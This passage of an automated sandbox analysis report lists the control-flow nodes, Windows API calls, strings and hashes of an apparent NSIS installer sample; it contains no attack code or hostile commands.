40297b 4753->4760 
4761 4062cf 11 API calls 4754->4761 4762 4062cf 11 API calls 4755->4762 4756->4749 4758 4062cf 11 API calls 4757->4758 4758->4756 4759->4746 4768 406250 4760->4768 4765 402922 4761->4765 4762->4745 4765->4750 4767 4062cf 11 API calls 4767->4765 4769 406273 4768->4769 4770 4062b6 4769->4770 4771 406288 wsprintfW 4769->4771 4772 402991 4770->4772 4773 4062bf lstrcatW 4770->4773 4771->4770 4771->4771 4772->4767 4773->4772 4774 403d02 4775 403d0d 4774->4775 4776 403d11 4775->4776 4777 403d14 GlobalAlloc 4775->4777 4777->4776 4778 402082 4779 401446 18 API calls 4778->4779 4780 402093 SetWindowLongW 4779->4780 4781 4030e3 4780->4781 4782 402a84 4783 401553 19 API calls 4782->4783 4784 402a8e 4783->4784 4785 401446 18 API calls 4784->4785 4786 402a98 4785->4786 4787 401a13 4786->4787 4788 402ab2 RegEnumKeyW 4786->4788 4789 402abe RegEnumValueW 4786->4789 4790 402a7e 4788->4790 4789->4787 4789->4790 4790->4787 4791 4029e4 RegCloseKey 4790->4791 4791->4787 4792 402c8a 4793 402ca2 4792->4793 4794 402c8f 4792->4794 4796 40145c 18 API calls 4793->4796 4795 401446 18 API calls 4794->4795 4798 402c97 4795->4798 4797 402ca9 lstrlenW 4796->4797 4797->4798 4799 401a13 4798->4799 4800 402ccb WriteFile 4798->4800 4800->4799 4801 401d8e 4802 40145c 18 API calls 4801->4802 4803 401d95 ExpandEnvironmentStringsW 4802->4803 4804 401da8 4803->4804 4805 401db9 4803->4805 4804->4805 4806 401dad lstrcmpW 4804->4806 4806->4805 4807 401e0f 4808 401446 18 API calls 4807->4808 4809 401e17 4808->4809 4810 401446 18 API calls 4809->4810 4811 401e21 4810->4811 4812 4030e3 4811->4812 4814 405f7d wsprintfW 4811->4814 4814->4812 4815 40438f 4816 4043c8 4815->4816 4817 40439f 4815->4817 4818 403df6 8 API calls 4816->4818 4819 403d6b 19 API calls 4817->4819 4821 4043d4 4818->4821 4820 4043ac SetDlgItemTextW 4819->4820 4820->4816 4822 403f90 4823 403fa0 4822->4823 4824 403fbc 4822->4824 4833 405cb0 GetDlgItemTextW 4823->4833 4826 403fc2 SHGetPathFromIDListW 4824->4826 4827 403fef 4824->4827 4829 403fd2 
4826->4829 4832 403fd9 SendMessageW 4826->4832 4828 403fad SendMessageW 4828->4824 4830 40141d 80 API calls 4829->4830 4830->4832 4832->4827 4833->4828 4834 402392 4835 40145c 18 API calls 4834->4835 4836 402399 4835->4836 4839 407224 4836->4839 4840 406efe 25 API calls 4839->4840 4841 407244 4840->4841 4842 4023a7 4841->4842 4843 40724e lstrcpynW lstrcmpW 4841->4843 4844 407280 4843->4844 4845 407286 lstrcpynW 4843->4845 4844->4845 4845->4842 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 
3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4846 402797 4847 40145c 18 API calls 4846->4847 4848 4027ae 4847->4848 4849 40145c 18 API calls 4848->4849 4850 4027b7 4849->4850 4851 40145c 18 API calls 4850->4851 4852 4027c0 GetPrivateProfileStringW lstrcmpW 4851->4852 4853 401e9a 4854 40145c 18 API calls 4853->4854 4855 401ea1 4854->4855 4856 401446 18 API calls 4855->4856 4857 401eab wsprintfW 4856->4857 3817 401a1f 3818 40145c 18 API calls 3817->3818 3819 401a26 3818->3819 3820 4062cf 11 API calls 3819->3820 3821 401a49 3820->3821 3822 401a64 3821->3822 3823 401a5c 3821->3823 3892 406035 lstrcpynW 3822->3892 3891 406035 lstrcpynW 3823->3891 3826 401a6f 3893 40674e lstrlenW CharPrevW 3826->3893 3827 401a62 3830 406064 5 API calls 3827->3830 3861 401a81 3830->3861 3831 406301 2 API calls 3831->3861 3834 401a98 CompareFileTime 3834->3861 3835 401ba9 3836 404f9e 25 API calls 3835->3836 3838 401bb3 3836->3838 3837 401b5d 3839 404f9e 25 API calls 3837->3839 3870 40337f 3838->3870 3841 401b70 3839->3841 3845 4062cf 11 API calls 3841->3845 3843 406035 lstrcpynW 3843->3861 3844 4062cf 11 API calls 3846 401bda 3844->3846 3850 401b8b 3845->3850 3847 401be9 SetFileTime 3846->3847 3848 401bf8 CloseHandle 3846->3848 3847->3848 3848->3850 3851 401c09 3848->3851 3849 406831 18 API calls 3849->3861 3852 
401c21 3851->3852 3853 401c0e 3851->3853 3854 406831 18 API calls 3852->3854 3855 406831 18 API calls 3853->3855 3856 401c29 3854->3856 3858 401c16 lstrcatW 3855->3858 3859 4062cf 11 API calls 3856->3859 3858->3856 3862 401c34 3859->3862 3860 401b50 3864 401b93 3860->3864 3865 401b53 3860->3865 3861->3831 3861->3834 3861->3835 3861->3837 3861->3843 3861->3849 3861->3860 3863 4062cf 11 API calls 3861->3863 3869 405e7c GetFileAttributesW CreateFileW 3861->3869 3896 405e5c GetFileAttributesW 3861->3896 3899 405ccc 3861->3899 3866 405ccc MessageBoxIndirectW 3862->3866 3863->3861 3867 4062cf 11 API calls 3864->3867 3868 4062cf 11 API calls 3865->3868 3866->3850 3867->3850 3868->3837 3869->3861 3871 40339a 3870->3871 3872 4033c7 3871->3872 3905 403368 SetFilePointer 3871->3905 3903 403336 ReadFile 3872->3903 3876 401bc6 3876->3844 3877 403546 3879 40354a 3877->3879 3880 40356e 3877->3880 3878 4033eb GetTickCount 3878->3876 3883 403438 3878->3883 3881 403336 ReadFile 3879->3881 3880->3876 3884 403336 ReadFile 3880->3884 3885 40358d WriteFile 3880->3885 3881->3876 3882 403336 ReadFile 3882->3883 3883->3876 3883->3882 3887 40348a GetTickCount 3883->3887 3888 4034af MulDiv wsprintfW 3883->3888 3890 4034f3 WriteFile 3883->3890 3884->3880 3885->3876 3886 4035a1 3885->3886 3886->3876 3886->3880 3887->3883 3889 404f9e 25 API calls 3888->3889 3889->3883 3890->3876 3890->3883 3891->3827 3892->3826 3894 401a75 lstrcatW 3893->3894 3895 40676b lstrcatW 3893->3895 3894->3827 3895->3894 3897 405e79 3896->3897 3898 405e6b SetFileAttributesW 3896->3898 3897->3861 3898->3897 3900 405ce1 3899->3900 3901 405d2f 3900->3901 3902 405cf7 MessageBoxIndirectW 3900->3902 3901->3861 3902->3901 3904 403357 3903->3904 3904->3876 3904->3877 3904->3878 3905->3872 4858 40209f GetDlgItem GetClientRect 4859 40145c 18 API calls 4858->4859 4860 4020cf LoadImageW SendMessageW 4859->4860 4861 4030e3 4860->4861 4862 4020ed DeleteObject 4860->4862 4862->4861 4863 402b9f 4864 401446 18 API calls 4863->4864 4868 
402ba7 4864->4868 4865 402c4a 4866 402bdf ReadFile 4866->4868 4875 402c3d 4866->4875 4867 401446 18 API calls 4867->4875 4868->4865 4868->4866 4869 402c06 MultiByteToWideChar 4868->4869 4870 402c3f 4868->4870 4871 402c4f 4868->4871 4868->4875 4869->4868 4869->4871 4876 405f7d wsprintfW 4870->4876 4873 402c6b SetFilePointer 4871->4873 4871->4875 4873->4875 4874 402d17 ReadFile 4874->4875 4875->4865 4875->4867 4875->4874 4876->4865 4877 402b23 GlobalAlloc 4878 402b39 4877->4878 4879 402b4b 4877->4879 4880 401446 18 API calls 4878->4880 4881 40145c 18 API calls 4879->4881 4883 402b41 4880->4883 4882 402b52 WideCharToMultiByte lstrlenA 4881->4882 4882->4883 4884 402b84 WriteFile 4883->4884 4885 402b93 4883->4885 4884->4885 4886 402384 GlobalFree 4884->4886 4886->4885 4888 4040a3 4889 4040b0 lstrcpynW lstrlenW 4888->4889 4890 4040ad 4888->4890 4890->4889 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 
405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 
3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 

Control-flow Graph
APIs
• GetDlgItem.USER32(?,00000403), ref: 0040515B
• GetDlgItem.USER32(?,000003EE), ref: 0040516A
• GetClientRect.USER32(?,?), ref: 004051C2
• GetSystemMetrics.USER32(00000015), ref: 004051CA
• SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
• SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
• SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
• ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
• ShowWindow.USER32(?,00000008), ref: 00405266
• GetDlgItem.USER32(?,000003EC), ref: 00405287
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
• SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
• GetDlgItem.USER32(?,000003F8), ref: 00405179
  • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425D19,759223A0,00000000), ref: 00406902
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
• GetDlgItem.USER32(?,000003EC), ref: 004052D7
• CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
• CloseHandle.KERNELBASE(00000000), ref: 004052EC
• ShowWindow.USER32(00000000), ref: 00405313
• ShowWindow.USER32(?,00000008), ref: 00405318
• ShowWindow.USER32(00000008), ref: 0040535F
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
• CreatePopupMenu.USER32 ref: 004053A2
• AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
• GetWindowRect.USER32(?,?), ref: 004053CA
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
• OpenClipboard.USER32(00000000), ref: 00405437
• EmptyClipboard.USER32 ref: 0040543D
• GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
• GlobalLock.KERNEL32(00000000), ref: 00405453
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
• GlobalUnlock.KERNEL32(00000000), ref: 00405489
• SetClipboardData.USER32(0000000D,00000000), ref: 00405494
• CloseClipboard.USER32 ref: 0040549A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                                            • String ID: New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                                                                            • API String ID: 2110491804-1641061399
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                                                                            • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                                            • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                                            • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                                                                                                                                                                            • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                                                                                                                                                                            • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                                                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                                                                                                                                                                            • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                                                                                                                                                                            • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                                                                                                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                                                                            • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                                                                                                                                                                            • API String ID: 2435955865-3712954417
                                                                                                                                                                                                                                                                                                                            • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                                                            • String ID: jF
                                                                                                                                                                                                                                                                                                                            • API String ID: 2295610775-3349280890
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 310444273-0

                                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 00401648
